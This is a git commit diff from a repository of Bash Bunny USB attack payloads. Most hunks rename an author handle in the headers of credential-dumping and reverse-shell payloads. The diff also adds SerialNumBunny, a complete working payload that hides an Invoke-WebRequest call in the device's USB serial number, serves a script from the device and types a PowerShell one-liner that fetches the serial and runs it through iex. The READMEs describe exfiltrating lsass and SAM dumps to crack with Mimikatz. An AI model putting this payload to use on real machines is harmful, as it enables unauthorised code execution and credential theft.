commit
fddae91cc5
|
@ -1,7 +1,7 @@
|
|||
# Title: FireSnatcher
|
||||
# Description: Copies Wifi Keys, and Firefox Password Databases
|
||||
# Author: KarrotKak3
|
||||
# Props: saintcrossbow & 0iphor13
|
||||
# Props: saintcrossbow & 0i41E
|
||||
# Version: 1.0.2.0 (Work in Progress)
|
||||
# Category: Credentials
|
||||
# Target: Windows (Logged in)
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Title: FireSnatcher
|
||||
# Description: Copies Wifi Keys, and Firefox Password Databases
|
||||
# Author: KarrotKak3
|
||||
# Props: saintcrossbow & 0iphor13
|
||||
# Props: saintcrossbow & 0i41E
|
||||
# Version: 1.0.2.0 (Work in Progress)
|
||||
# Category: Credentials
|
||||
# Target: Windows (Logged in)
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
**Title: HashDumpBunny**
|
||||
|
||||
Author: 0iphor13
|
||||
Author: 0i41E
|
||||
|
||||
Version: 1.0
|
||||
|
||||
|
@ -17,4 +17,4 @@ Place BunnyDump.bat in the same payload switch-folder as your payload.txt
|
|||
#
|
||||
Plug in BashBunny.
|
||||
Exfiltrate the out.txt file and try to crack the hashes.
|
||||
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png)
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png)
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
#
|
||||
# Title: HashDumpBunny
|
||||
# Description: Dump user hashes with this script, which was obfuscated with multiple layers.
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
**Title: MiniDumpBunny**
|
||||
|
||||
Author: 0iphor13
|
||||
Author: 0i41E
|
||||
|
||||
Version: 1.0
|
||||
|
||||
|
@ -14,4 +14,4 @@ What is MiniDumpBunny?
|
|||
Plug in your BashBunny equipped with the obfuscated MiniBunny.bat file, wait a few seconds, go away.
|
||||
#
|
||||
Exfiltrate the .dmp file and read it with Mimikatz.
|
||||
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png)
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png)
|
|
@ -2,7 +2,7 @@
|
|||
#
|
||||
# Title: MiniDumpBunny
|
||||
# Description: Dump lsass with this script, which was obfuscated with multiple layers.
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
**Title: ProcDumpBunny**
|
||||
|
||||
Author: 0iphor13
|
||||
Author: 0i41E
|
||||
|
||||
Version: 1.0
|
||||
|
||||
|
@ -12,10 +12,10 @@ What is ProcDumpBunny?
|
|||
**Instruction:**
|
||||
|
||||
Download ProcDump from Microsoft - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump - rename the Executeable to Bunny.exe
|
||||
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(38).png)
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(38).png)
|
||||
Place Bunny.exe in the same payload switch as your payload
|
||||
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(37).png)
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(37).png)
|
||||
#
|
||||
Plug in BashBunny.
|
||||
Exfiltrate the out.dmp file and read it with Mimikatz.
|
||||
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(39).png)
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(39).png)
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
#
|
||||
# Title: ProcDumpBunny
|
||||
# Description: Dump lsass.exe with a renamed version of procdump
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
**Title: SamDumpBunny**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.0<br>
|
||||
|
||||
|
@ -21,4 +21,4 @@ Afterwards you can use a tool like samdump2 to extract the users hashes.</p>
|
|||
|
||||
**!Disclaimer! samdump2 has proven to be unreliable in the recent past.**
|
||||
|
||||
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)
|
||||
![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
#
|
||||
# Title: SamDumpBunny
|
||||
# Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
**Title: SessionBunny**
|
||||
|
||||
Author: 0iphor13
|
||||
Author: 0i41E
|
||||
(Credit for SessionGopher: Brandon Arvanaghi)
|
||||
|
||||
Version: 1.0
|
||||
|
@ -19,4 +19,4 @@ Place SessionBunny.ps1 in the same payload switch-folder as your payload.txt
|
|||
#
|
||||
Plug in BashBunny.
|
||||
Wait for the script to finish and decide what you wanna do with the information gathered
|
||||
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/SessionBunny/censorepic.png)
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/SessionBunny/censorepic.png)
|
||||
|
|
|
@ -43,7 +43,7 @@
|
|||
o
|
||||
o_
|
||||
/ ". SessionGopher
|
||||
," _-" Bunny Edition (0iphor13)
|
||||
," _-" Bunny Edition (0i41E)
|
||||
," m m
|
||||
..+ ) Brandon Arvanaghi
|
||||
`m..m @arvanaghi | arvanaghi.com
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: SessionBunny
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
|
|
@ -0,0 +1,15 @@
|
|||
#This is just an example script, you may want to replace it with a script of your choice
|
||||
$Picture=@"
|
||||
|
||||
_____ _____ _____ _____ _____ _____ _____ _____ __ __
|
||||
(\___/) | __ || _ || __|| | | | __ || | || | || | || | |
|
||||
(='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|
|
||||
(")_(") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_|
|
||||
Bash Bunny by Hak5 USB Attack/Automation Platform
|
||||
|
||||
"@
|
||||
|
||||
Sleep -s 5
|
||||
Write-Host -ForegroundColor red "$Picture"
|
||||
Sleep -s 2
|
||||
Write-Host -ForegroundColor green "SerialNumBunny by 0i41E"
|
Binary file not shown.
After Width: | Height: | Size: 31 KiB |
|
@ -0,0 +1,46 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: SerialNumBunny
|
||||
# Description: Execute strings placed in the Bunny serial number
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Execution
|
||||
# Attackmodes: HID, RNDIS_ETHERNET
|
||||
|
||||
# Starting as Ethernet device only first to get IP
|
||||
LED SETUP
|
||||
ATTACKMODE RNDIS_ETHERNET
|
||||
|
||||
GET SWITCH_POSITION
|
||||
GET HOST_IP
|
||||
|
||||
# Switch to Ethernet & HID
|
||||
LED Y
|
||||
# Defining Device Identifiers - Serialnumber contains payload
|
||||
ATTACKMODE RNDIS_ETHERNET HID VID_0XF000 PID_0X1234 MAN_HAK5 PROD_BASHBUNNY SN_IWR_-URI_HTTP://$HOST_IP/1.PS1
|
||||
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||||
|
||||
# starting server
|
||||
LED SPECIAL
|
||||
|
||||
# disallow outgoing dns requests so the server is accessible immediately
|
||||
iptables -A OUTPUT -p udp --dport 53 -j DROP
|
||||
python -m SimpleHTTPServer 80 &
|
||||
|
||||
# wait until port is listening
|
||||
while ! nc -z localhost 80; do sleep 0.2; done
|
||||
|
||||
#Opens hidden powershell instance
|
||||
Q DELAY 1500
|
||||
Q GUI r
|
||||
Q DELAY 500
|
||||
Q STRING "powershell"
|
||||
Q DELAY 500
|
||||
Q ENTER
|
||||
|
||||
Q DELAY 1000
|
||||
# Make sure that device ID matches what was defined above
|
||||
Q STRING "((Get-PnpDevice -PresentOnly -Class USB | Where-Object { \$_.DeviceID -like \"*F000*\" } | ForEach-Object { (\$_).DeviceID -split '\\\\' | Select-Object -Last 1 }) -join '').Replace('_', ' ')|iex|iex"
|
||||
Q DELAY 400
|
||||
Q ENTER
|
||||
LED FINISH
|
|
@ -0,0 +1,19 @@
|
|||
**Title: SerialNumBunny**
|
||||
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.0<br>
|
||||
|
||||
**What is SerialNumBunny?**
|
||||
|
||||
*It is pretty simple... The BashBunny enables you to set its USB identifiers. You can change VID, PID, Manufacturer and of course, the Serial number. Now we do the little trick here and place our payload within the serial number. Then starting a webserver on the Bunny, where a script is hosted and call the serial number via powershell on the target system. The content of the retrieved script is then executed on the target. Easy as that.*
|
||||
|
||||
You can get pretty creative here, from basically calling basic powershell commands, up to this example where you execute remote scripts.
|
||||
|
||||
**Instruction:**
|
||||
|
||||
- Upload your script or the example provided onto your Bunnys switch folder.
|
||||
- Plug in the Bunny and let the magic happen.
|
||||
![SerialNumBunny](https://github.com/0i41E/bashbunny-payloads/assets/79219148/fa11d9b5-e2f2-45a9-a701-5a25220ca226)
|
||||
|
||||
_Note: If you want to adapt your payload nested, in the serial number, you may need to stay in a certain character limit. In my case this was 40 characters. This might be different, depending on your target. Also make sure to replace spaces within the serial number with underscores._
|
|
@ -2,7 +2,7 @@
|
|||
#
|
||||
# Title: WifiSnatch
|
||||
# Description: Extract wifi information, such as passphrases & SSIDs
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.1
|
||||
# Category: Exfiltration
|
||||
# Attackmodes: HID, Storage
|
||||
|
|
|
@ -105,7 +105,7 @@ Arf
|
|||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
* [0iphor13](https://github.com/0iphor13)
|
||||
* [0i41E](https://github.com/0i41E)
|
||||
* [PhilSutter](https://github.com/PhilSutter)
|
||||
|
||||
|
||||
|
|
|
@ -93,7 +93,7 @@ I am Jakoby
|
|||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
* [0iphor13](https://github.com/0iphor13)
|
||||
* [0i41E](https://github.com/0i41E)
|
||||
* [PhilSutter](https://github.com/PhilSutter)
|
||||
|
||||
|
||||
|
|
|
@ -15,7 +15,7 @@
|
|||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||
#
|
||||
# Modified by 0iphor13 for PingZhellBunny
|
||||
# Modified by 0i41E for PingZhellBunny
|
||||
#
|
||||
#
|
||||
#
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
**Title: PingZhellBunny**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.5<br>
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
#
|
||||
# Title: PingZhellBunny
|
||||
# Description: Getting remote access via ICMP
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.5
|
||||
# Category: Remote_Access
|
||||
# Attackmodes: HID, RNDIS_ETHERNET
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
**Title: ReverseBunny**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.5<br>
|
||||
|
||||
|
@ -8,7 +8,7 @@ Version: 1.5<br>
|
|||
<p>!Getting remote access via obfuscated reverse shell!<br>
|
||||
Upload payload.txt and RevBunny.ps1 onto your Bunny
|
||||
|
||||
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png)
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png)
|
||||
|
||||
Change the variables in payload.txt to your attacking machine & start your listener. (for example netcat: nc -lvnp [PORT] )</p>
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
#
|
||||
# Title: ReverseBunny
|
||||
# Description: Get remote access, using an obfuscated powershell reverse shell.
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.5
|
||||
# Category: Remote_Access
|
||||
# Attackmodes: HID, RNDIS_ETHERNET
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
**Title: ReverseBunnySSL**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.2<br>
|
||||
For input and inspiration - Thanks to: Cribbit, sebkinne</p>
|
||||
|
@ -26,5 +26,5 @@ I recommend openssl itself or ncat - Example syntax for both:<br>
|
|||
|
||||
**Disclaimer: Because of obfuscation, it may take some time until the shell is fully executed by powershell**
|
||||
|
||||
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/remote_access/ReverseCableSSL/CreateCert.png)
|
||||
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunnySSL/Startscreen.png)
|
||||
![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/remote_access/ReverseCableSSL/CreateCert.png)
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunnySSL/Startscreen.png)
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
#
|
||||
# Title: ReverseBunnySSL
|
||||
# Description: Get remote access, using an obfuscated powershell reverse shell.
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.2
|
||||
# Category: Remote_Access
|
||||
# Attackmodes: HID, RNDIS_ETHERNET
|
||||
|
|
Loading…
Reference in New Issue